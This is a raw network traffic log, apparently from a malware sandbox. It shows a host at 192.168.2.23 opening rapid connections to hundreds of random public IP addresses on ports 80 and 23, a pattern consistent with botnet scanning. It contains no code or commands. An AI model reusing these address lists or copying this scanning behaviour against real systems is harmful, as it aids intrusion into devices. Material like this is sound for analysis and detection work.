                                                          Dec 3, 2024 23:16:45.888134956 CET4059680192.168.2.23113.253.104.43
                                                          Dec 3, 2024 23:16:45.888153076 CET4059680192.168.2.2398.16.185.119
                                                          Dec 3, 2024 23:16:45.888164997 CET4059680192.168.2.2399.132.28.127
                                                          Dec 3, 2024 23:16:45.888164997 CET4059680192.168.2.23220.34.152.191
                                                          Dec 3, 2024 23:16:45.888175011 CET4059680192.168.2.2395.191.143.72
                                                          Dec 3, 2024 23:16:45.888181925 CET4059680192.168.2.23161.69.100.59
                                                          Dec 3, 2024 23:16:45.888200045 CET4059680192.168.2.2383.141.195.90
                                                          Dec 3, 2024 23:16:45.888200998 CET4059680192.168.2.2332.85.178.133
                                                          Dec 3, 2024 23:16:45.888215065 CET4059680192.168.2.23133.120.65.212
                                                          Dec 3, 2024 23:16:45.888220072 CET4059680192.168.2.2388.120.17.161
                                                          Dec 3, 2024 23:16:45.888223886 CET4059680192.168.2.23153.171.160.31
                                                          Dec 3, 2024 23:16:45.888236046 CET4059680192.168.2.23163.147.209.4
                                                          Dec 3, 2024 23:16:45.888236046 CET4059680192.168.2.23178.180.102.38
                                                          Dec 3, 2024 23:16:45.888257027 CET4059680192.168.2.23203.130.28.85
                                                          Dec 3, 2024 23:16:45.888257027 CET4059680192.168.2.23210.104.23.123
                                                          Dec 3, 2024 23:16:45.888271093 CET4059680192.168.2.23110.162.24.129
                                                          Dec 3, 2024 23:16:45.888282061 CET4059680192.168.2.2367.201.66.51
                                                          Dec 3, 2024 23:16:45.888284922 CET4059680192.168.2.23180.226.246.106
                                                          Dec 3, 2024 23:16:45.888298035 CET4059680192.168.2.2373.75.128.70
                                                          Dec 3, 2024 23:16:45.888303995 CET4059680192.168.2.2383.127.22.124
                                                          Dec 3, 2024 23:16:45.888312101 CET4059680192.168.2.23179.17.223.55
                                                          Dec 3, 2024 23:16:45.888319016 CET4059680192.168.2.23190.176.103.31
                                                          Dec 3, 2024 23:16:45.888319016 CET4059680192.168.2.2387.164.125.94
                                                          Dec 3, 2024 23:16:45.888319016 CET4059680192.168.2.2360.218.190.100
                                                          Dec 3, 2024 23:16:45.888319016 CET4059680192.168.2.234.144.217.238
                                                          Dec 3, 2024 23:16:45.888341904 CET4059680192.168.2.2323.90.38.100
                                                          Dec 3, 2024 23:16:45.888349056 CET4059680192.168.2.23154.50.119.28
                                                          Dec 3, 2024 23:16:45.888350964 CET4059680192.168.2.2346.143.114.48
                                                          Dec 3, 2024 23:16:45.888355970 CET4059680192.168.2.23141.136.184.102
                                                          Dec 3, 2024 23:16:45.888362885 CET4059680192.168.2.23140.181.245.243
                                                          Dec 3, 2024 23:16:45.888377905 CET4059680192.168.2.23195.33.185.34
                                                          Dec 3, 2024 23:16:45.888384104 CET4059680192.168.2.23103.65.60.249
                                                          Dec 3, 2024 23:16:45.888402939 CET4059680192.168.2.23180.239.83.171
                                                          Dec 3, 2024 23:16:45.888406038 CET4059680192.168.2.23153.120.151.198
                                                          Dec 3, 2024 23:16:45.888406038 CET4059680192.168.2.2383.74.243.201
                                                          Dec 3, 2024 23:16:45.888416052 CET4059680192.168.2.23160.179.78.37
                                                          Dec 3, 2024 23:16:45.888431072 CET4059680192.168.2.23174.92.161.200
                                                          Dec 3, 2024 23:16:45.888432026 CET4059680192.168.2.23166.187.134.35
                                                          Dec 3, 2024 23:16:45.888451099 CET4059680192.168.2.23164.18.119.132
                                                          Dec 3, 2024 23:16:45.888453007 CET4059680192.168.2.2337.23.1.183
                                                          Dec 3, 2024 23:16:45.888456106 CET4059680192.168.2.23196.1.63.70
                                                          Dec 3, 2024 23:16:45.888456106 CET4059680192.168.2.2366.211.39.207
                                                          Dec 3, 2024 23:16:45.888467073 CET4059680192.168.2.2335.119.36.140
                                                          Dec 3, 2024 23:16:45.888467073 CET4059680192.168.2.23222.109.185.30
                                                          Dec 3, 2024 23:16:45.888480902 CET4059680192.168.2.2370.21.54.157
                                                          Dec 3, 2024 23:16:45.888494968 CET4059680192.168.2.23212.163.88.91
                                                          Dec 3, 2024 23:16:45.888500929 CET4059680192.168.2.23213.43.51.58
                                                          Dec 3, 2024 23:16:45.888510942 CET4059680192.168.2.23170.179.68.242
                                                          Dec 3, 2024 23:16:45.888514042 CET4059680192.168.2.23164.156.225.143
                                                          Dec 3, 2024 23:16:45.888520956 CET4059680192.168.2.23116.29.141.91
                                                          Dec 3, 2024 23:16:45.888536930 CET4059680192.168.2.235.12.175.253
                                                          Dec 3, 2024 23:16:45.888537884 CET4059680192.168.2.23133.79.193.113
                                                          Dec 3, 2024 23:16:45.888546944 CET4059680192.168.2.23126.46.70.207
                                                          Dec 3, 2024 23:16:45.888552904 CET4059680192.168.2.2360.240.18.82
                                                          Dec 3, 2024 23:16:45.888569117 CET4059680192.168.2.2354.78.153.128
                                                          Dec 3, 2024 23:16:45.888571024 CET4059680192.168.2.2394.43.7.38
                                                          Dec 3, 2024 23:16:45.888587952 CET4059680192.168.2.23134.210.22.179
                                                          Dec 3, 2024 23:16:45.888591051 CET4059680192.168.2.23115.92.251.71
                                                          Dec 3, 2024 23:16:45.888607979 CET4059680192.168.2.2381.102.149.198
                                                          Dec 3, 2024 23:16:45.888612032 CET4059680192.168.2.23167.85.43.26
                                                          Dec 3, 2024 23:16:45.888614893 CET4059680192.168.2.232.28.177.169
                                                          Dec 3, 2024 23:16:45.888628960 CET4059680192.168.2.23204.211.42.84
                                                          Dec 3, 2024 23:16:45.888644934 CET4059680192.168.2.239.18.12.161
                                                          Dec 3, 2024 23:16:45.888645887 CET4059680192.168.2.2383.0.153.97
                                                          Dec 3, 2024 23:16:45.888664007 CET4059680192.168.2.2354.224.207.20
                                                          Dec 3, 2024 23:16:45.888667107 CET4059680192.168.2.23194.199.94.123
                                                          Dec 3, 2024 23:16:45.888680935 CET4059680192.168.2.2371.74.18.232
                                                          Dec 3, 2024 23:16:45.888684034 CET4059680192.168.2.2395.194.232.199
                                                          Dec 3, 2024 23:16:45.888698101 CET4059680192.168.2.23221.199.254.225
                                                          Dec 3, 2024 23:16:45.888700008 CET4059680192.168.2.23101.176.162.155
                                                          Dec 3, 2024 23:16:45.888719082 CET4059680192.168.2.23157.172.22.26
                                                          Dec 3, 2024 23:16:45.888721943 CET4059680192.168.2.23198.102.168.220
                                                          Dec 3, 2024 23:16:45.888734102 CET4059680192.168.2.2396.171.29.140
                                                          Dec 3, 2024 23:16:45.888734102 CET4059680192.168.2.2367.181.50.1
                                                          Dec 3, 2024 23:16:45.888751030 CET4059680192.168.2.2336.180.199.247
                                                          Dec 3, 2024 23:16:45.888820887 CET5725280192.168.2.23220.191.45.226
                                                          Dec 3, 2024 23:16:45.888834953 CET5290680192.168.2.2352.109.45.182
                                                          Dec 3, 2024 23:16:45.915810108 CET80559669.156.190.104192.168.2.23
                                                          Dec 3, 2024 23:16:45.915883064 CET5596680192.168.2.239.156.190.104
                                                          Dec 3, 2024 23:16:45.923908949 CET8034724175.139.215.108192.168.2.23
                                                          Dec 3, 2024 23:16:45.931967974 CET805289852.109.45.182192.168.2.23
                                                          Dec 3, 2024 23:16:45.931978941 CET8057244220.191.45.226192.168.2.23
                                                          Dec 3, 2024 23:16:46.010755062 CET8040596111.129.118.141192.168.2.23
                                                          Dec 3, 2024 23:16:46.010773897 CET804059649.188.188.233192.168.2.23
                                                          Dec 3, 2024 23:16:46.010783911 CET804059697.41.29.227192.168.2.23
                                                          Dec 3, 2024 23:16:46.010802031 CET8040596110.77.100.173192.168.2.23
                                                          Dec 3, 2024 23:16:46.010821104 CET804059637.79.12.216192.168.2.23
                                                          Dec 3, 2024 23:16:46.010869980 CET804059613.3.191.55192.168.2.23
                                                          Dec 3, 2024 23:16:46.010880947 CET8040596107.26.129.146192.168.2.23
                                                          Dec 3, 2024 23:16:46.010895967 CET8040596160.108.6.246192.168.2.23
                                                          Dec 3, 2024 23:16:46.010905981 CET8040596105.92.24.72192.168.2.23
                                                          Dec 3, 2024 23:16:46.010915041 CET4059680192.168.2.2397.41.29.227
                                                          Dec 3, 2024 23:16:46.010915041 CET4059680192.168.2.23110.77.100.173
                                                          Dec 3, 2024 23:16:46.010915995 CET4059680192.168.2.2349.188.188.233
                                                          Dec 3, 2024 23:16:46.010916948 CET4059680192.168.2.2337.79.12.216
                                                          Dec 3, 2024 23:16:46.010919094 CET4059680192.168.2.23111.129.118.141
                                                          Dec 3, 2024 23:16:46.010927916 CET4059680192.168.2.2313.3.191.55
                                                          Dec 3, 2024 23:16:46.010927916 CET4059680192.168.2.23107.26.129.146
                                                          Dec 3, 2024 23:16:46.010927916 CET4059680192.168.2.23160.108.6.246
                                                          Dec 3, 2024 23:16:46.010940075 CET4059680192.168.2.23105.92.24.72
                                                          Dec 3, 2024 23:16:46.011075974 CET804059653.125.178.189192.168.2.23
                                                          Dec 3, 2024 23:16:46.011085987 CET8040596194.223.37.30192.168.2.23
                                                          Dec 3, 2024 23:16:46.011095047 CET8034732175.139.215.108192.168.2.23
                                                          Dec 3, 2024 23:16:46.011104107 CET8040596186.45.45.229192.168.2.23
                                                          Dec 3, 2024 23:16:46.011113882 CET8040596108.165.135.39192.168.2.23
                                                          Dec 3, 2024 23:16:46.011112928 CET4059680192.168.2.2353.125.178.189
                                                          Dec 3, 2024 23:16:46.011122942 CET804059675.96.152.124192.168.2.23
                                                          Dec 3, 2024 23:16:46.011133909 CET804059688.109.144.121192.168.2.23
                                                          Dec 3, 2024 23:16:46.011133909 CET4059680192.168.2.23194.223.37.30
                                                          Dec 3, 2024 23:16:46.011133909 CET3473280192.168.2.23175.139.215.108
                                                          Dec 3, 2024 23:16:46.011143923 CET4059680192.168.2.23186.45.45.229
                                                          Dec 3, 2024 23:16:46.011143923 CET4059680192.168.2.23108.165.135.39
                                                          Dec 3, 2024 23:16:46.011143923 CET8040596107.254.158.162192.168.2.23
                                                          Dec 3, 2024 23:16:46.011154890 CET8040596192.62.46.240192.168.2.23
                                                          Dec 3, 2024 23:16:46.011161089 CET4059680192.168.2.2388.109.144.121
                                                          Dec 3, 2024 23:16:46.011162996 CET4059680192.168.2.2375.96.152.124
                                                          Dec 3, 2024 23:16:46.011164904 CET8040596116.59.162.85192.168.2.23
                                                          Dec 3, 2024 23:16:46.011176109 CET8040596177.95.70.145192.168.2.23
                                                          Dec 3, 2024 23:16:46.011182070 CET4059680192.168.2.23107.254.158.162
                                                          Dec 3, 2024 23:16:46.011185884 CET4059680192.168.2.23192.62.46.240
                                                          Dec 3, 2024 23:16:46.011185884 CET8040596181.16.202.67192.168.2.23
                                                          Dec 3, 2024 23:16:46.011195898 CET8040596126.128.117.174192.168.2.23
                                                          Dec 3, 2024 23:16:46.011200905 CET4059680192.168.2.23116.59.162.85
                                                          Dec 3, 2024 23:16:46.011215925 CET4059680192.168.2.23177.95.70.145
                                                          Dec 3, 2024 23:16:46.011219978 CET4059680192.168.2.23181.16.202.67
                                                          Dec 3, 2024 23:16:46.011219978 CET4059680192.168.2.23126.128.117.174
                                                          Dec 3, 2024 23:16:46.012594938 CET8057252220.191.45.226192.168.2.23
                                                          Dec 3, 2024 23:16:46.012634039 CET805290652.109.45.182192.168.2.23
                                                          Dec 3, 2024 23:16:46.012638092 CET5725280192.168.2.23220.191.45.226
                                                          Dec 3, 2024 23:16:46.012672901 CET5290680192.168.2.2352.109.45.182
                                                          Dec 3, 2024 23:16:46.386852980 CET4060223192.168.2.2347.117.159.86
                                                          Dec 3, 2024 23:16:46.386854887 CET4060223192.168.2.2350.186.10.186
                                                          Dec 3, 2024 23:16:46.386854887 CET4060223192.168.2.23223.96.186.59
                                                          Dec 3, 2024 23:16:46.386857033 CET4060223192.168.2.23123.181.30.99
                                                          Dec 3, 2024 23:16:46.386867046 CET4060223192.168.2.23123.252.231.217
                                                          Dec 3, 2024 23:16:46.386873007 CET4060223192.168.2.23199.238.183.81
                                                          Dec 3, 2024 23:16:46.386887074 CET4060223192.168.2.23147.242.5.133
                                                          Dec 3, 2024 23:16:46.386895895 CET4060223192.168.2.23161.152.46.196
                                                          Dec 3, 2024 23:16:46.386895895 CET4060223192.168.2.23108.44.48.114
                                                          Dec 3, 2024 23:16:46.386895895 CET4060223192.168.2.2340.109.90.228
                                                          Dec 3, 2024 23:16:46.386903048 CET4060223192.168.2.23198.189.113.143
                                                          Dec 3, 2024 23:16:46.386913061 CET4060223192.168.2.23150.173.229.11
                                                          Dec 3, 2024 23:16:46.386913061 CET4060223192.168.2.23158.85.95.150
                                                          Dec 3, 2024 23:16:46.386920929 CET4060223192.168.2.2351.132.249.56
                                                          Dec 3, 2024 23:16:46.386924028 CET4060223192.168.2.23151.240.39.152
                                                          Dec 3, 2024 23:16:46.386936903 CET4060223192.168.2.23133.111.104.194
                                                          Dec 3, 2024 23:16:46.386938095 CET4060223192.168.2.2340.155.36.84
                                                          Dec 3, 2024 23:16:46.386944056 CET4060223192.168.2.2382.88.141.198
                                                          Dec 3, 2024 23:16:46.386944056 CET4060223192.168.2.23208.194.164.70
                                                          Dec 3, 2024 23:16:46.386950970 CET4060223192.168.2.2382.205.195.109
                                                          Dec 3, 2024 23:16:46.386967897 CET4060223192.168.2.2399.183.248.196
                                                          Dec 3, 2024 23:16:46.386967897 CET4060223192.168.2.2357.17.77.51
                                                          Dec 3, 2024 23:16:46.386969090 CET4060223192.168.2.23220.222.86.116
                                                          Dec 3, 2024 23:16:46.386976957 CET4060223192.168.2.23205.114.36.151
                                                          Dec 3, 2024 23:16:46.386977911 CET4060223192.168.2.2323.191.150.65
                                                          Dec 3, 2024 23:16:46.386977911 CET4060223192.168.2.23189.231.50.87
                                                          Dec 3, 2024 23:16:46.386977911 CET4060223192.168.2.2364.16.22.181
                                                          Dec 3, 2024 23:16:46.386981964 CET4060223192.168.2.2348.92.44.82
                                                          Dec 3, 2024 23:16:46.386997938 CET4060223192.168.2.234.181.235.234
                                                          Dec 3, 2024 23:16:46.386997938 CET4060223192.168.2.23206.181.41.37
                                                          Dec 3, 2024 23:16:46.387007952 CET4060223192.168.2.23178.162.72.43
                                                          Dec 3, 2024 23:16:46.387010098 CET4060223192.168.2.2377.112.247.243
                                                          Dec 3, 2024 23:16:46.387010098 CET4060223192.168.2.2365.86.58.226
                                                          Dec 3, 2024 23:16:46.387012959 CET4060223192.168.2.23113.40.76.240
                                                          Dec 3, 2024 23:16:46.387025118 CET4060223192.168.2.23183.133.122.5
                                                          Dec 3, 2024 23:16:46.387026072 CET4060223192.168.2.2320.206.54.166
                                                          Dec 3, 2024 23:16:46.387031078 CET4060223192.168.2.2353.69.255.214
                                                          Dec 3, 2024 23:16:46.387031078 CET4060223192.168.2.23178.31.253.80
                                                          Dec 3, 2024 23:16:46.387032032 CET4060223192.168.2.23131.79.78.52
                                                          Dec 3, 2024 23:16:46.387031078 CET4060223192.168.2.23212.140.111.119
                                                          Dec 3, 2024 23:16:46.387044907 CET4060223192.168.2.2314.3.188.11
                                                          Dec 3, 2024 23:16:46.387056112 CET4060223192.168.2.23199.216.131.248
                                                          Dec 3, 2024 23:16:46.387059927 CET4060223192.168.2.23129.96.32.114
                                                          Dec 3, 2024 23:16:46.387063026 CET4060223192.168.2.234.185.189.239
                                                          Dec 3, 2024 23:16:46.387104034 CET4060223192.168.2.23191.103.34.9
                                                          Dec 3, 2024 23:16:46.387104034 CET4060223192.168.2.2325.98.126.63
                                                          Dec 3, 2024 23:16:46.387104034 CET4060223192.168.2.23163.81.23.79
                                                          Dec 3, 2024 23:16:46.387105942 CET4060223192.168.2.23193.234.170.22
                                                          Dec 3, 2024 23:16:46.387144089 CET4060223192.168.2.2393.130.183.12
                                                          Dec 3, 2024 23:16:46.387144089 CET4060223192.168.2.2386.71.86.232
                                                          Dec 3, 2024 23:16:46.387147903 CET4060223192.168.2.2324.218.6.228
                                                          Dec 3, 2024 23:16:46.387149096 CET4060223192.168.2.23150.192.227.174
                                                          Dec 3, 2024 23:16:46.387147903 CET4060223192.168.2.23149.109.6.126
                                                          Dec 3, 2024 23:16:46.387149096 CET4060223192.168.2.2314.82.226.30
                                                          Dec 3, 2024 23:16:46.387151003 CET4060223192.168.2.2396.242.210.237
                                                          Dec 3, 2024 23:16:46.387150049 CET4060223192.168.2.2370.25.216.49
                                                          Dec 3, 2024 23:16:46.387151003 CET4060223192.168.2.2332.68.34.237
                                                          Dec 3, 2024 23:16:46.387150049 CET4060223192.168.2.23123.140.161.216
                                                          Dec 3, 2024 23:16:46.387151003 CET4060223192.168.2.23206.63.75.122
                                                          Dec 3, 2024 23:16:46.387147903 CET4060223192.168.2.23176.245.182.108
                                                          Dec 3, 2024 23:16:46.387156963 CET4060223192.168.2.2324.85.178.25
                                                          Dec 3, 2024 23:16:46.387157917 CET4060223192.168.2.23161.154.240.177
                                                          Dec 3, 2024 23:16:46.387156963 CET4060223192.168.2.2384.17.185.75
                                                          Dec 3, 2024 23:16:46.387156963 CET4060223192.168.2.23151.90.150.30
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.23100.177.187.206
                                                          Dec 3, 2024 23:16:46.387190104 CET4060223192.168.2.23111.221.230.131
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.23148.52.234.29
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.23135.205.44.218
                                                          Dec 3, 2024 23:16:46.387190104 CET4060223192.168.2.23115.82.55.220
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.2313.32.3.222
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.23143.241.151.249
                                                          Dec 3, 2024 23:16:46.387193918 CET4060223192.168.2.23154.236.204.128
                                                          Dec 3, 2024 23:16:46.387196064 CET4060223192.168.2.23223.81.91.36
                                                          Dec 3, 2024 23:16:46.387193918 CET4060223192.168.2.23191.97.187.8
                                                          Dec 3, 2024 23:16:46.387196064 CET4060223192.168.2.2399.7.227.20
                                                          Dec 3, 2024 23:16:46.387190104 CET4060223192.168.2.23219.133.98.212
                                                          Dec 3, 2024 23:16:46.387196064 CET4060223192.168.2.23135.19.197.149
                                                          Dec 3, 2024 23:16:46.387193918 CET4060223192.168.2.23135.168.15.182
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.2384.87.60.187
                                                          Dec 3, 2024 23:16:46.387193918 CET4060223192.168.2.23140.149.48.145
                                                          Dec 3, 2024 23:16:46.387191057 CET4060223192.168.2.23213.186.31.213
                                                          Dec 3, 2024 23:16:46.387193918 CET4060223192.168.2.23207.183.146.246
                                                          Dec 3, 2024 23:16:46.387197018 CET4060223192.168.2.23204.136.237.58
                                                          Dec 3, 2024 23:16:46.387197018 CET4060223192.168.2.23142.96.10.74
                                                          Dec 3, 2024 23:16:46.387197018 CET4060223192.168.2.2394.118.93.59
                                                          Dec 3, 2024 23:16:46.387197018 CET4060223192.168.2.2377.212.67.229
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.2380.143.34.126
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.23177.100.221.171
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.23135.99.195.76
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.2380.55.126.102
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.23136.66.201.108
                                                          Dec 3, 2024 23:16:46.387238979 CET4060223192.168.2.23219.71.126.206
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.2336.240.218.221
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.2387.20.150.141
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23122.243.137.99
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23102.56.86.97
                                                          Dec 3, 2024 23:16:46.387243986 CET4060223192.168.2.23184.87.153.106
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23183.251.179.137
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23200.23.145.198
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.2314.242.209.28
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.23112.70.17.34
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23138.204.131.57
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23152.116.241.172
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23183.155.203.225
                                                          Dec 3, 2024 23:16:46.387243032 CET4060223192.168.2.23192.30.153.188
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.23108.88.133.230
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23155.220.193.56
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.23101.106.151.81
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23135.97.40.248
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.2383.9.149.72
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23168.135.39.118
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.23123.8.228.153
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.2345.118.255.129
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.2313.190.227.87
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23155.137.67.42
                                                          Dec 3, 2024 23:16:46.387244940 CET4060223192.168.2.23151.152.117.67
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.23177.123.244.62
                                                          Dec 3, 2024 23:16:46.387245893 CET4060223192.168.2.2377.69.227.167
                                                          Dec 3, 2024 23:16:46.387280941 CET4060223192.168.2.23221.166.226.54
                                                          Dec 3, 2024 23:16:46.387280941 CET4060223192.168.2.23203.171.54.114
                                                          Dec 3, 2024 23:16:46.387280941 CET4060223192.168.2.2391.232.201.189
                                                          Dec 3, 2024 23:16:46.387280941 CET4060223192.168.2.23187.202.109.24
                                                          Dec 3, 2024 23:16:46.387284994 CET4060223192.168.2.23205.206.23.194
                                                          Dec 3, 2024 23:16:46.387284994 CET4060223192.168.2.23157.128.97.77
                                                          Dec 3, 2024 23:16:46.387284994 CET4060223192.168.2.2397.38.27.242
                                                          Dec 3, 2024 23:16:46.387284994 CET4060223192.168.2.2338.199.113.166
                                                          Dec 3, 2024 23:16:46.387288094 CET4060223192.168.2.23139.80.209.186
                                                          Dec 3, 2024 23:16:46.387288094 CET4060223192.168.2.23105.202.121.123
                                                          Dec 3, 2024 23:16:46.387288094 CET4060223192.168.2.23132.131.188.83
                                                          Dec 3, 2024 23:16:46.387290001 CET4060223192.168.2.23186.139.10.34
                                                          Dec 3, 2024 23:16:46.387290001 CET4060223192.168.2.23184.203.230.34
                                                          Dec 3, 2024 23:16:46.387290001 CET4060223192.168.2.23141.37.127.131
                                                          Dec 3, 2024 23:16:46.387290955 CET4060223192.168.2.232.174.11.191
                                                          Dec 3, 2024 23:16:46.387290001 CET4060223192.168.2.2332.36.10.127
                                                          Dec 3, 2024 23:16:46.387290955 CET4060223192.168.2.2349.75.238.105
                                                          Dec 3, 2024 23:16:46.387290001 CET4060223192.168.2.2369.48.2.226
                                                          Dec 3, 2024 23:16:46.387290955 CET4060223192.168.2.2340.187.119.38
                                                          Dec 3, 2024 23:16:46.387291908 CET4060223192.168.2.23102.65.0.248
                                                          Dec 3, 2024 23:16:46.387290955 CET4060223192.168.2.2390.56.98.59
                                                          Dec 3, 2024 23:16:46.387291908 CET4060223192.168.2.2394.54.82.250
                                                          Dec 3, 2024 23:16:46.387290955 CET4060223192.168.2.2342.178.217.201
                                                          Dec 3, 2024 23:16:46.387303114 CET4060223192.168.2.23176.96.54.214
                                                          Dec 3, 2024 23:16:46.387331963 CET4060223192.168.2.2317.227.194.118
                                                          Dec 3, 2024 23:16:46.387331963 CET4060223192.168.2.2369.231.157.246
                                                          Dec 3, 2024 23:16:46.387331963 CET4060223192.168.2.2397.176.2.199
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.23134.15.191.133
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.2334.56.199.92
                                                          Dec 3, 2024 23:16:46.387336016 CET4060223192.168.2.23191.231.43.21
                                                          Dec 3, 2024 23:16:46.387336016 CET4060223192.168.2.2395.218.77.230
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.2317.62.93.224
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.239.132.83.0
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.2325.59.3.186
                                                          Dec 3, 2024 23:16:46.387335062 CET4060223192.168.2.23164.158.254.46
                                                          Dec 3, 2024 23:16:46.387337923 CET4060223192.168.2.23199.182.235.169
                                                          Dec 3, 2024 23:16:46.387340069 CET4060223192.168.2.2343.79.64.189
                                                          Dec 3, 2024 23:16:46.387340069 CET4060223192.168.2.2335.190.75.253
                                                          Dec 3, 2024 23:16:46.387340069 CET4060223192.168.2.2350.216.222.156
                                                          Dec 3, 2024 23:16:46.387341976 CET4060223192.168.2.23203.93.29.118
                                                          Dec 3, 2024 23:16:46.387341976 CET4060223192.168.2.23148.151.52.174
                                                          Dec 3, 2024 23:16:46.387341976 CET4060223192.168.2.23107.238.32.93
                                                          Dec 3, 2024 23:16:46.387343884 CET4060223192.168.2.23113.248.126.203
                                                          Dec 3, 2024 23:16:46.387343884 CET4060223192.168.2.2319.177.102.88
                                                          Dec 3, 2024 23:16:46.387343884 CET4060223192.168.2.2312.160.39.194
                                                          Dec 3, 2024 23:16:46.387351990 CET4060223192.168.2.23166.202.226.69
                                                          Dec 3, 2024 23:16:46.387351990 CET4060223192.168.2.2312.144.52.171
                                                          Dec 3, 2024 23:16:46.387351990 CET4060223192.168.2.23106.128.210.11
                                                          Dec 3, 2024 23:16:46.387351990 CET4060223192.168.2.2350.196.240.145
                                                          Dec 3, 2024 23:16:46.387351990 CET4060223192.168.2.2366.176.40.42
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.23101.120.194.220
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.2383.223.10.177
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.23134.173.59.184
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.23176.1.75.132
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.23209.106.229.243
                                                          Dec 3, 2024 23:16:46.387397051 CET4060223192.168.2.2354.115.29.55
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.23218.89.155.161
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.2348.170.91.112
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.2351.48.80.65
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.2370.13.249.16
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.2389.122.171.197
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.23222.167.89.122
                                                          Dec 3, 2024 23:16:46.387403011 CET4060223192.168.2.2345.6.118.177
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.2394.32.190.75
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.23213.190.185.183
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.23194.188.19.252
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.2359.248.154.178
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.23125.63.161.65
                                                          Dec 3, 2024 23:16:46.387404919 CET4060223192.168.2.23220.187.190.59
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23223.195.219.7
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.2364.185.232.102
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23115.230.244.148
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.2324.209.38.112
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23194.189.43.175
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23206.200.172.89
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23146.161.83.195
                                                          Dec 3, 2024 23:16:46.387408972 CET4060223192.168.2.23138.161.137.129
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23193.19.185.230
                                                          Dec 3, 2024 23:16:46.387408972 CET4060223192.168.2.23174.69.152.55
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.2396.133.168.255
                                                          Dec 3, 2024 23:16:46.387408972 CET4060223192.168.2.23171.170.185.144
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.23134.12.7.196
                                                          Dec 3, 2024 23:16:46.387408972 CET4060223192.168.2.2334.234.74.26
                                                          Dec 3, 2024 23:16:46.387407064 CET4060223192.168.2.2314.48.27.235
                                                          Dec 3, 2024 23:16:46.387408972 CET4060223192.168.2.2380.162.225.213
                                                          Dec 3, 2024 23:16:46.387412071 CET4060223192.168.2.2364.109.47.60
                                                          Dec 3, 2024 23:16:46.387412071 CET4060223192.168.2.23150.148.16.243
                                                          Dec 3, 2024 23:16:46.387412071 CET4060223192.168.2.23138.53.156.91
                                                          Dec 3, 2024 23:16:46.387412071 CET4060223192.168.2.2347.10.125.43
                                                          Dec 3, 2024 23:16:46.387464046 CET4060223192.168.2.23186.162.160.46
                                                          Dec 3, 2024 23:16:46.387464046 CET4060223192.168.2.2346.123.7.226
                                                          Dec 3, 2024 23:16:46.387464046 CET4060223192.168.2.2338.200.46.61
                                                          Dec 3, 2024 23:16:46.387465000 CET4060223192.168.2.2342.161.189.231
